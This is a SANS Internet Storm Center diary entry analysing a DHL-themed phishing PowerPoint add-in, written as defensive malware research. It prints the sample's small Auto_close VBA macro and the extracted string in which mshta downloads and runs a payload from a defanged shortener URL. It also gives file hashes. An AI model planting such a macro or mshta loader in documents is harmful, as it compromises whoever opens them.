ISC Stormcast For Friday, April 23rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7470

Malicious PowerPoint Add-On: "Small Is Beautiful"

Published: 2021-04-23. Last Updated: 2021-04-23 05:45:29 UTC
by Xavier Mertens (Version: 1)
2 comment(s)

Yesterday I spotted a DHL-branded phishing campaign that used a PowerPoint file to compromise the victim. The malicious attachment is a PowerPoint add-in. This technique is not new, I already analyzed such a sample in a previous diary[1]. The filename is "dhl-shipment-notification-6207428452.ppt" (SHA256:934df0be5a13def81901b075f07f3d1f141056a406204d53f2f72ae53f583341) and has a VT score of 18/60[2].

The main feature of this file could be described as "small is beautiful". A very small VBA macro is present in the file:

remnux@remnux:/MalwareZoo/20210422$ oledump.py dhl-shipment-notification-6207428452.ppt 
  1:       444 '\x05DocumentSummaryInformation'
  2:     43736 '\x05SummaryInformation'
  3:       535 'PROJECT'
  4:        44 'PROJECTwm'
  5: M    1482 'VBA/Module111'
  6:      3231 'VBA/_VBA_PROJECT'
  7:      1886 'VBA/__SRP_0'
  8:       142 'VBA/__SRP_1'
  9:       260 'VBA/__SRP_2'
 10:       103 'VBA/__SRP_3'
 11:       382 'VBA/__SRP_4'
 12:        66 'VBA/__SRP_5'
 13:       768 'VBA/dir'
 14: m    1377 'VBA/sex'
 15:        97 'sex/\x01CompObj'
 16:       286 'sex/\x03VBFrame'
 17:        90 'sex/f'
 18:       115 'sex/i01/\x01CompObj'
 19:       220 'sex/i01/f'
 20:       110 'sex/i01/i03/\x01CompObj'
 21:        40 'sex/i01/i03/f'
 22:         0 'sex/i01/i03/o'
 23:       110 'sex/i01/i04/\x01CompObj'
 24:        40 'sex/i01/i04/f'
 25:         0 'sex/i01/i04/o'
 26:       148 'sex/i01/o'
 27:        48 'sex/i01/x'
 28:         0 'sex/o'

The macro is so simple but effective:

remnux@remnux:/MalwareZoo/20210422$ oledump.py dhl-shipment-notification-6207428452.ppt -s 5 -v
Attribute VB_Name = "Module111"
Sub _
Auto_close()
Dim k As New sex
Shell sex.krnahai.bachikyasath.Tag
End Sub

The macro will be executed when the document is closed and refers to an object "sex". You can see many references to this string in the first oledump output. This is a Microsoft Form:

remnux@remnux:/MalwareZoo/20210422$ oledump.py dhl-shipment-notification-6207428452.ppt -s 15
00000000: 01 00 FE FF 03 0A 00 00  FF FF FF FF 00 00 00 00  ................
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 19 00 00 00  ................
00000020: 4D 69 63 72 6F 73 6F 66  74 20 46 6F 72 6D 73 20  Microsoft Forms 
00000030: 32 2E 30 20 46 6F 72 6D  00 10 00 00 00 45 6D 62  2.0 Form.....Emb
00000040: 65 64 64 65 64 20 4F 62  6A 65 63 74 00 00 00 00  edded Object....
00000050: 00 F4 39 B2 71 00 00 00  00 00 00 00 00 00 00 00  ..9.q...........
00000060: 00                   

You could try to load the add-in and check the form with PowerPoint (in a sandbox!) but, most of the time, just extracting strings will do the job. Let's search for the property "bachikyasath":

remnux@remnux:/MalwareZoo/20210422$ strings dhl-shipment-notification-6207428452.ppt | \
                                    grep -A 3 -B 3 bachikyasath
sexr
UserFormN
krnahai
bachikyasath<"
Tag&
merilaylo
Attribut
--
Tab4
Tahoma
Page1a
bachikyasath"mshta""hxxps://j[.]mp/hdjkashdjkahs"
Microsoft Forms 2.0 Form
Embedded Object
Forms.Form.1

The macro just spawns a shell that executes the Microsoft tool "mshta.exe" which will download and execute the payload from hxxps://j[.]mp/hdjkashdjkahs

Unfortunately, this URL points to blogspot.com page and I was not able to grab the payload. I searched on VT and found that the same file was uploaded one day before and received a score of 0/60! (SHA256:ff1683773ad9b57473e5206023b5ef2eca5b51572bffa7b9e0559408e3e41424)

 

[1] https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162
[2] https://bazaar.abuse.ch/sample/934df0be5a13def81901b075f07f3d1f141056a406204d53f2f72ae53f583341

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

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